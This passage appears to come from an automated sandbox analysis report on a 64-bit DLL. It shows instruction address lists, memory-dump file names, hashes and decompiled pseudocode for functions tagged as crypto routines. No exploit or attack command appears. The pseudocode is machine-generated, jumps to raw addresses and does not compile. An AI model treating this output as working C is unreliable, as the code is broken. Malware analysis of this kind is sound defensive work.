				 *_t1169 =  *((intOrPtr*)(_t1370 + 0xe0)) -  *(_t1370 + 0xb8) + __r15 +  *(_t1370 + 0xd8);
				 *((long long*)(_t1169 + 0x10)) = _t1399 - _t1368;
				return _t646;
			}

0x7fef305f97b
0x7fef305f97b
0x7fef305f985
0x7fef305f989
0x7fef305f98c
0x7fef305f99c
0x7fef305f9a1
0x7fef305f9a8
0x7fef305f9ab
0x7fef305f9af
0x7fef305f9b3
0x7fef305f9b7
0x7fef305f9bb
0x7fef305f9bf
0x7fef305f9c3
0x7fef305f9d2
0x7fef305f9df
0x7fef305f9f2
0x7fef305f9f9
0x7fef305fa08
0x7fef305fa0c
0x7fef305fa0f
0x7fef305fa14
0x7fef305fa19
0x7fef305fa1e
0x7fef305fa22
0x7fef305fa2d
0x7fef305fa32
0x7fef305fa3f
0x7fef305fa51
0x7fef305fa55
0x7fef305fa5b
0x7fef305fa68
0x7fef305fa73
0x7fef305fa7c
0x7fef305fa84
0x7fef305fa88
0x7fef305fa90
0x7fef305fa98
0x7fef305fa9c
0x7fef305faa3
0x7fef305faa9
0x7fef305faaf
0x7fef305fabc
0x7fef305fac1
0x7fef305fac7
0x7fef305facd
0x7fef305fad0
0x7fef305fad8
0x7fef305fadc
0x7fef305fadf
0x7fef305fae2
0x7fef305fae7
0x7fef305faee
0x7fef305faf0
0x7fef305faf5
0x7fef305faf7
0x7fef305faff
0x7fef305fb07
0x7fef305fb10
0x7fef305fb18
0x7fef305fb1e
0x7fef305fb28
0x7fef305fb2c
0x7fef305fb2f
0x7fef305fb34
0x7fef305fb3a
0x7fef305fb47
0x7fef305fb52
0x7fef305fb5a
0x7fef305fb60
0x7fef305fb63
0x7fef305fb6b
0x7fef305fb79
0x7fef305fb7c
0x7fef305fb82
0x7fef305fb93
0x7fef305fb9e
0x7fef305fba2
0x7fef305fba5
0x7fef305fbae
0x7fef305fbb1
0x7fef305fbba
0x7fef305fbcc
0x7fef305fbe3
0x7fef305fbe7
0x7fef305fbe9
0x7fef305fbed
0x7fef305fbf0
0x7fef305fbf3
0x7fef305fbfd
0x7fef305fc02
0x7fef305fc0b
0x7fef305fc10
0x7fef305fc14
0x7fef305fc24
0x7fef305fc2c
0x7fef305fc37
0x7fef305fc3a
0x7fef305fc42
0x7fef305fc50
0x7fef305fc55
0x7fef305fc57
0x7fef305fc61
0x7fef305fc64
0x7fef305fc6c
0x7fef305fc70
0x7fef305fc73
0x7fef305fc79
0x7fef305fc7e
0x7fef305fc85
0x7fef305fc87
0x7fef305fc9b
0x7fef305fca0
0x7fef305fcb6
0x7fef305fcbb
0x7fef305fcbe
0x7fef305fcc3
0x7fef305fccb
0x7fef305fcd5
0x7fef305fcdc
0x7fef305fcf3
0x7fef305fcf5
0x7fef305fcfe
0x7fef305fd04
0x7fef305fd09
0x7fef305fd15
0x7fef305fd18
0x7fef305fd1d
0x7fef305fd20
0x7fef305fd24
0x7fef305fd27
0x7fef305fd2a
0x7fef305fd2f
0x7fef305fd36
0x7fef305fd38
0x7fef305fd3a
0x7fef305fd4a
0x7fef305fd4d
0x7fef305fd56
0x7fef305fd59
0x7fef305fd61
0x7fef305fd66
0x7fef305fd69
0x7fef305fd72
0x7fef305fd7a
0x7fef305fd81
0x7fef305fd95
0x7fef305fd9f
0x7fef305fda3
0x7fef305fda9
0x7fef305fdb3
0x7fef305fdb6
0x7fef305fdca
0x7fef305fdce
0x7fef305fdd9
0x7fef305fde2
0x7fef305fde7
0x7fef305fdf0
0x7fef305fdf8
0x7fef305fdfe
0x7fef305fe01
0x7fef305fe0c
0x7fef305fe13
0x7fef305fe1e
0x7fef305fe25
0x7fef305fe2e
0x7fef305fe35
0x7fef305fe41
0x7fef305fe47
0x7fef305fe4d
0x7fef305fe55
0x7fef305fe64
0x7fef305fe68
0x7fef305fe6d
0x7fef305fe70
0x7fef305fe74
0x7fef305fe83
0x7fef305fe8b
0x7fef305fe96
0x7fef305fea1
0x7fef305feaa
0x7fef305feae
0x7fef305feb7
0x7fef305febd
0x7fef305fec8
0x7fef305feca
0x7fef305fecf
0x7fef305fed3
0x7fef305fed6
0x7fef305fedb
0x7fef305fedd
0x7fef305fee1
0x7fef305fee4
0x7fef305fee8
0x7fef305fef6
0x7fef305fefe
0x7fef305ff09
0x7fef305ff14
0x7fef305ff1d
0x7fef305ff21
0x7fef305ff2a
0x7fef305ff3d
0x7fef305ff45
0x7fef305ff4c
0x7fef305ff50
0x7fef305ff58
0x7fef305ff5e
0x7fef305ff66
0x7fef305ff6a
0x7fef305ff7b
0x7fef305ff81
0x7fef305ff86
0x7fef305ff8f
0x7fef305ff93
0x7fef305ff9b
0x7fef305ffa9
0x7fef305ffac
0x7fef305ffb2
0x7fef305ffb8
0x7fef305ffbc
0x7fef305ffbf
0x7fef305ffc7
0x7fef305ffd7
0x7fef305ffe0
0x7fef305ffe7
0x7fef305fff5
0x7fef3060000
0x7fef306000b
0x7fef306000d
0x7fef3060012
0x7fef3060014
0x7fef306001c
0x7fef3060028
0x7fef306002c
0x7fef3060035
0x7fef306003b
0x7fef3060046
0x7fef306004f
0x7fef3060054
0x7fef3060059
0x7fef3060068
0x7fef306006b
0x7fef306006e
0x7fef3060073
0x7fef3060076
0x7fef306007d
0x7fef3060083
0x7fef306008f
0x7fef3060092
0x7fef3060095
0x7fef306009a
0x7fef306009d
0x7fef30600a9
0x7fef30600b4
0x7fef30600c1
0x7fef30600ca
0x7fef30600ce
0x7fef30600d7
0x7fef30600dd
0x7fef30600ea
0x7fef30600f1
0x7fef30600fa
0x7fef3060101
0x7fef306010c
0x7fef306011e
0x7fef306012d
0x7fef306013b
0x7fef306013e
0x7fef3060142
0x7fef3060149
0x7fef306014b
0x7fef3060151
0x7fef3060159
0x7fef3060160
0x7fef3060167
0x7fef306016e
0x7fef3060175
0x7fef306017e
0x7fef306018c
0x7fef3060194
0x7fef306019a
0x7fef306019d
0x7fef30601a8
0x7fef30601af
0x7fef30601b7
0x7fef30601ba
0x7fef30601c0
0x7fef30601ca
0x7fef30601ce
0x7fef30601db
0x7fef30601e1
0x7fef30601e5
0x7fef30601e9
0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef3060217
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060241
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91e32f6e02fa84533435ed7f9a50e9ef3ac0bc56da36c023ccb97f14c91078e
Instruction ID: d5e73b1e162558066ace7deebc0b247013003d7b39d215ed484a2a7b9589b1ef
Opcode Fuzzy Hash: c91e32f6e02fa84533435ed7f9a50e9ef3ac0bc56da36c023ccb97f14c91078e
Instruction Fuzzy Hash: 28F1E732B087C58BE7A48F19E4403AAB7E1F7D8754F149232DA9957BA8DB3CE441DB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305F73A Relevance: .3, Instructions: 347
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF305F73A() {
				unsigned int _t57;
				signed char _t78;
				signed char _t80;
				unsigned int _t82;
				signed char _t86;
				signed char _t87;
				void* _t106;
				signed int _t108;
				unsigned long long _t125;
				signed long long _t128;
				signed long long _t129;
				void* _t147;
				void* _t150;
				signed long long _t152;
				void* _t155;
				long long _t156;
				void* _t157;
				intOrPtr _t158;
				void* _t160;
				void* _t161;
				signed char* _t162;
				signed char* _t163;
				signed char* _t166;
				signed long long _t168;

				_t78 =  *(_t155 + 0x38);
				_t147 = _t160;
				if (_t106 >= 0) goto 0xf3060496;
				if (_t147 == _t168) goto 0xf305f77d;
				_t129 = _t128 << _t78;
				 *(_t155 + 0x30) =  *(_t155 + 0x30) | _t129;
				 *(_t155 + 0x38) = _t78 + 8;
				_t161 = _t147 + 1;
				goto 0xf305f782;
				_t108 =  *(_t155 + 0x50) & 0x00000002;
				if (_t108 == 0) goto 0xf305f74e;
				_t80 =  *(_t155 + 0x38);
				_t150 = _t161;
				if (_t108 >= 0) goto 0xf30604be;
				if (_t150 == _t168) goto 0xf305f7cf;
				 *(_t155 + 0x30) =  *(_t155 + 0x30) | _t129 << _t80;
				 *(_t155 + 0x38) = _t80 + 8;
				_t162 = _t150 + 1;
				goto 0xf305f7d4;
				_t152 = _t168;
				if (( *(_t155 + 0x50) & 0x00000002) == 0) goto 0xf305f7a0;
				if (_t162 == _t168) goto 0xf30611fa;
				_t163 =  &(_t162[1]);
				 *(_t157 + 0xc) =  *_t162 & 0x000000ff;
				r12b = 2;
				 *((long long*)(_t155 + 0x70)) = _t156;
				_t49 =  *(_t155 + 0x1b8);
				_t82 =  *(_t157 + 0xc);
				r8d = _t82;
				r8d = r8d << 8;
				r10d = _t82;
				r10d = r10d & 0x0000000f;
				r11b =  *(_t155 + 0x100) >> ((_t82 >> 0x00000004) + 0x00000008 & 0x0000003f) == 0;
				r11b = r11b & ( *(_t155 + 0x1b8) & 0xffffff00 | (_t49 & 0x00000004) == 0x00000000);
				r12d =  *(_t155 + 0x50);
				if (_t163 == _t168) goto 0xf305f8b8;
				r9d =  *_t163 & 0x000000ff;
				_t55 =  !=  ? 0x1c01 : 0x301;
				r12d = 0x1c01;
				if (r11b != 0) goto 0xf305f89e;
				r12d =  !=  ? 0x1c01 : 0x301;
				 *( *((intOrPtr*)(_t155 + 0x58)) + 0x10) = r9d;
				r12d =  >=  ? 0x1c01 : r12d;
				if (r12b == 0) goto 0xf305f83f;
				_t57 = r12b & 0xffffffff;
				if (_t57 != 1) goto 0xf3060ba4;
				r12d = r12d >> 8;
				_t166 =  &(_t163[1]);
				_t158 =  *((intOrPtr*)(_t155 + 0x58));
				_t86 =  *(_t155 + 0x38);
				if (_t86 - 3 >= 0) goto 0xf305f93d;
				if (_t166 == _t168) goto 0xf305f92c;
				_t125 =  *(_t155 + 0x30) | _t152 << _t86;
				 *(_t155 + 0x30) = _t125;
				_t87 = _t86 + 8;
				 *(_t155 + 0x38) = _t87;
				r12d = 0;
				goto 0xf305f932;
				r12d =  *(_t155 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305f902;
				goto 0xf305fa58;
				 *(_t155 + 0x30) = _t125 >> 3;
				 *(_t155 + 0x38) = _t87 + 0xfffffffd;
				 *(_t158 + 0x18) = _t57 & 0x00000001;
				 *(_t158 + 0x1c) = _t57 >> 0x00000001 & 0x00000003;
				goto __rax;
			}

0x7fef305f743
0x7fef305f747
0x7fef305f752
0x7fef305f75b
0x7fef305f761
0x7fef305f76a
0x7fef305f772
0x7fef305f778
0x7fef305f77b
0x7fef305f782
0x7fef305f785
0x7fef305f795
0x7fef305f799
0x7fef305f7a4
0x7fef305f7ad
0x7fef305f7bc
0x7fef305f7c4
0x7fef305f7ca
0x7fef305f7cd
0x7fef305f7cf
0x7fef305f7d7
0x7fef305f7e1
0x7fef305f7eb
0x7fef305f7ee
0x7fef305f7f2
0x7fef305f7fa
0x7fef305f7ff
0x7fef305f80b
0x7fef305f80f
0x7fef305f812
0x7fef305f816
0x7fef305f82d
0x7fef305f834
0x7fef305f838
0x7fef305f842
0x7fef305f848
0x7fef305f850
0x7fef305f88e
0x7fef305f893
0x7fef305f899
0x7fef305f89b
0x7fef305f8a9
0x7fef305f8ad
0x7fef305f8be
0x7fef305f8c4
0x7fef305f8d3
0x7fef305f8d9
0x7fef305f8dd
0x7fef305f8e0
0x7fef305f8f6
0x7fef305f905
0x7fef305f90a
0x7fef305f915
0x7fef305f918
0x7fef305f91d
0x7fef305f920
0x7fef305f924
0x7fef305f92a
0x7fef305f92f
0x7fef305f936
0x7fef305f938
0x7fef305f944
0x7fef305f94c
0x7fef305f955
0x7fef305f95e
0x7fef305f979

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a864c45e322edfcf5c5ce59e9d9311816b0182d1af6f2ff20614681d5c1cbf7c
Instruction ID: 091ab8978e8556381b7736d89a8c84b5e9c156cf78be7ce05f7150fa35056dfe
Opcode Fuzzy Hash: a864c45e322edfcf5c5ce59e9d9311816b0182d1af6f2ff20614681d5c1cbf7c
Instruction Fuzzy Hash: 9DE1E772B0C3C58BD7A48F29E4407AAB7D6F7887A4F148236DA9957BD8D63CD441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305F78C Relevance: .3, Instructions: 346
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF305F78C() {
				unsigned int _t48;
				signed char _t64;
				unsigned int _t66;
				signed char _t70;
				signed char _t71;
				void* _t89;
				unsigned long long _t106;
				signed long long _t109;
				void* _t125;
				signed long long _t127;
				void* _t130;
				long long _t131;
				void* _t132;
				intOrPtr _t133;
				void* _t135;
				signed char* _t136;
				signed char* _t137;
				signed char* _t140;
				signed long long _t142;

				_t64 =  *(_t130 + 0x38);
				_t125 = _t135;
				if (_t89 >= 0) goto 0xf30604be;
				if (_t125 == _t142) goto 0xf305f7cf;
				 *(_t130 + 0x30) =  *(_t130 + 0x30) | _t109 << _t64;
				 *(_t130 + 0x38) = _t64 + 8;
				_t136 = _t125 + 1;
				goto 0xf305f7d4;
				_t127 = _t142;
				if (( *(_t130 + 0x50) & 0x00000002) == 0) goto 0xf305f7a0;
				if (_t136 == _t142) goto 0xf30611fa;
				_t137 =  &(_t136[1]);
				 *(_t132 + 0xc) =  *_t136 & 0x000000ff;
				r12b = 2;
				 *((long long*)(_t130 + 0x70)) = _t131;
				_t40 =  *(_t130 + 0x1b8);
				_t66 =  *(_t132 + 0xc);
				r8d = _t66;
				r8d = r8d << 8;
				r10d = _t66;
				r10d = r10d & 0x0000000f;
				r11b =  *(_t130 + 0x100) >> ((_t66 >> 0x00000004) + 0x00000008 & 0x0000003f) == 0;
				r11b = r11b & ( *(_t130 + 0x1b8) & 0xffffff00 | (_t40 & 0x00000004) == 0x00000000);
				r12d =  *(_t130 + 0x50);
				if (_t137 == _t142) goto 0xf305f8b8;
				r9d =  *_t137 & 0x000000ff;
				_t46 =  !=  ? 0x1c01 : 0x301;
				r12d = 0x1c01;
				if (r11b != 0) goto 0xf305f89e;
				r12d =  !=  ? 0x1c01 : 0x301;
				 *( *((intOrPtr*)(_t130 + 0x58)) + 0x10) = r9d;
				r12d =  >=  ? 0x1c01 : r12d;
				if (r12b == 0) goto 0xf305f83f;
				_t48 = r12b & 0xffffffff;
				if (_t48 != 1) goto 0xf3060ba4;
				r12d = r12d >> 8;
				_t140 =  &(_t137[1]);
				_t133 =  *((intOrPtr*)(_t130 + 0x58));
				_t70 =  *(_t130 + 0x38);
				if (_t70 - 3 >= 0) goto 0xf305f93d;
				if (_t140 == _t142) goto 0xf305f92c;
				_t106 =  *(_t130 + 0x30) | _t127 << _t70;
				 *(_t130 + 0x30) = _t106;
				_t71 = _t70 + 8;
				 *(_t130 + 0x38) = _t71;
				r12d = 0;
				goto 0xf305f932;
				r12d =  *(_t130 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305f902;
				goto 0xf305fa58;
				 *(_t130 + 0x30) = _t106 >> 3;
				 *(_t130 + 0x38) = _t71 + 0xfffffffd;
				 *(_t133 + 0x18) = _t48 & 0x00000001;
				 *(_t133 + 0x1c) = _t48 >> 0x00000001 & 0x00000003;
				goto __rax;
			}

0x7fef305f795
0x7fef305f799
0x7fef305f7a4
0x7fef305f7ad
0x7fef305f7bc
0x7fef305f7c4
0x7fef305f7ca
0x7fef305f7cd
0x7fef305f7cf
0x7fef305f7d7
0x7fef305f7e1
0x7fef305f7eb
0x7fef305f7ee
0x7fef305f7f2
0x7fef305f7fa
0x7fef305f7ff
0x7fef305f80b
0x7fef305f80f
0x7fef305f812
0x7fef305f816
0x7fef305f82d
0x7fef305f834
0x7fef305f838
0x7fef305f842
0x7fef305f848
0x7fef305f850
0x7fef305f88e
0x7fef305f893
0x7fef305f899
0x7fef305f89b
0x7fef305f8a9
0x7fef305f8ad
0x7fef305f8be
0x7fef305f8c4
0x7fef305f8d3
0x7fef305f8d9
0x7fef305f8dd
0x7fef305f8e0
0x7fef305f8f6
0x7fef305f905
0x7fef305f90a
0x7fef305f915
0x7fef305f918
0x7fef305f91d
0x7fef305f920
0x7fef305f924
0x7fef305f92a
0x7fef305f92f
0x7fef305f936
0x7fef305f938
0x7fef305f944
0x7fef305f94c
0x7fef305f955
0x7fef305f95e
0x7fef305f979

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dccd628608b9574b9f97155606592198bffb39d352e1790a21652a6cebdceaed
Instruction ID: daeb37296b2b12765d32d8e12d2fdfa0070bad4d0cb9b04d35221b5074bde68b
Opcode Fuzzy Hash: dccd628608b9574b9f97155606592198bffb39d352e1790a21652a6cebdceaed
Instruction Fuzzy Hash: 48E1D772B0C3C58BD7A48F29E4407AAB7D6F7887A4F148236DA9957BD8D63CD441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30601F2 Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E000007FE7FEF30601F2(void* __ebx, signed int __rax, long long __r8, void* __r11, void* __r12, long long __r13, void* __r14, void* __r15) {
				signed char _t352;
				signed int _t360;
				signed int _t363;
				signed int _t366;
				unsigned int _t371;
				signed int _t372;
				short _t374;
				signed int _t388;
				signed short _t390;
				signed int _t391;
				signed int _t393;
				signed int _t401;
				signed short _t403;
				signed char _t412;
				signed int _t418;
				signed int _t421;
				unsigned int _t425;
				signed int _t454;
				signed char _t456;
				signed int _t465;
				signed char _t472;
				signed int _t476;
				signed int _t477;
				signed char _t479;
				signed char _t485;
				signed int _t489;
				signed char _t493;
				signed int _t496;
				signed char _t515;
				unsigned int _t522;
				signed char _t524;
				signed int _t534;
				signed int _t539;
				signed int _t552;
				signed int _t553;
				signed int _t561;
				signed int _t562;
				signed short _t565;
				void* _t569;
				signed int _t572;
				signed int _t577;
				signed int _t580;
				signed int _t583;
				signed char _t585;
				signed int _t593;
				signed int _t595;
				signed int _t619;
